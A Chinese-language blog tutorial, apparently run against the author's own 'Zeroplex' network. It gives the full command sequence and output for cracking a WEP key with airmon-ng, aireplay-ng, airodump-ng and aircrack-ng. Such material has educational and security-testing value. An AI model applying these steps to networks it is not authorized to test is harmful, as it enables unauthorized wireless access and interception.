Skip to content

Zeroplex 生活隨筆

軟體開發、伺服器和生活瑣事

小 縮小字型大小。 中 重設字型大小。 大 放大字型大小。

用 aircrack 解 WEP 密碼

Posted on 2012 年 1 月 6 日2021 年 3 月 12 日 By 日落 在〈用 aircrack 解 WEP 密碼〉中尚無留言

查詢 AP 資訊,找出目標 SSID 和 channel:

$ sudo iwlist wlan0 scanning
          Cell 01 - Address: 00:14:6C:7E:40:80
                    Channel:11
                    Frequency:2.462 GHz (Channel 11)
                    Quality=39/70  Signal level=-71 dBm  
                    Encryption key:on
                    ESSID:"Zeroplex"

用 airmon-ng 進入監聽模式,注意最後一個參數是目標 AP 所用的 channel:

$ sudo airmon-ng start wlan0 11

Interface Chipset  Driver

wlan0  RTL8187  rtl8187 - [phy2]
    (monitor mode enabled on mon0)

訊息後方有顯示模擬來監聽的網卡,之後 aireplay-ng 和 airodump-ng 會用這個 device。先用 aireplay-ng 檢查與目標 AP 的通訊狀況,參數「-9」表示做 injection test:

$ sudo aireplay-ng -9 -e Zeroplex mon0
21:39:04  Waiting for beacon frame (ESSID: Zeroplex) on channel 11
Found BSSID "00:14:6C:7E:40:80" to given ESSID "Zeroplex".
21:39:04  Trying broadcast probe requests...
21:39:04  Injection is working!
21:39:06  Found 1 AP 

21:39:06  Trying directed probe requests...
21:39:06  00:14:6C:7E:40:80 - channel: 11 - 'Zeroplex'
21:39:06  Ping (min/avg/max): 0.604ms/10.323ms/37.851ms Power: -14.86
21:39:06  29/30:  96%

最後一行的百分比表示訊號概況,數值越高表示成功率越高,距離 AP 太遠或是太近都會有影響。

準備好後就可以開始用 airodump-ng 監聽。參數「-i」表示只記錄對破解有用的資訊,沒有家䢢這個參數時,airodump-ng 會記錄所有封包內容,若有人在抓 BT 小心硬碟被吃光光;參數「-w」後加上記錄檔名稱;「–bssid」為目標 AP 的 MAC address、「-c」是channel,若沒有指定特定目標,airodump-ng 會記錄所有接收到的資訊。


$ sudo airodump-ng --bssid 00:14:6C:7E:40:80 -c 11 -i -w data mon0

 CH 11 ][ Elapsed: 0 s ][ 2012-01-07 21:48                                         
                                                                                                                            
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                         
                                                                                                                            
 00:14:6C:7E:40:80  -20   0        9        1    0  11  54e. WEP WEP        Zeroplex        

Beacons 與 Data 數量越多對破解越有利。

最後使用 aircrack 嘗試解開密碼:

$ aircrack-ng record-01.cap -l key.txt

解密碼會花上一段時間,若有成功解開密碼,會將密碼寫進 key.txt 裡;若資訊量不足以解開密碼,請繼續監聽,直到 IVs 達到門檻值後再嘗試。

aircrack 的 tutorial 裡面還有介紹 aireplay-ng 的其他玩法,有興趣的可以試試看。

Tutorial: Simple WEP Crack
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack

Tags:資訊安全

文章導覽

Previous Post: scanf 回傳值
Next Post: Prevent configuration while making ports on FreeBSD

發佈留言 取消回覆

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *


其他

關於我  (About me)

小額贊助

  文章 RSS Feed

  留言 RSS Feed

Apache AWS Bash C/C++ Docker FreeBSD GCP Git Google Java JavaScript Laravel Linux Microsoft MSSQL MySQL Nginx PHP PHPUnit PostgreSQL Python Qt Ubuntu Unix Vim Web Windows WordPress XD 作業系統 分享 好站推薦 專題 攝影 新奇搞笑 新聞 旅遊 生活雜記 程式設計 網路架站 網頁設計 資訊學習 資訊安全 遊戲 音樂


創用 CC 授權條款
本著作係採用創用 CC 姓名標示-相同方式分享 4.0 國際 授權條款授權.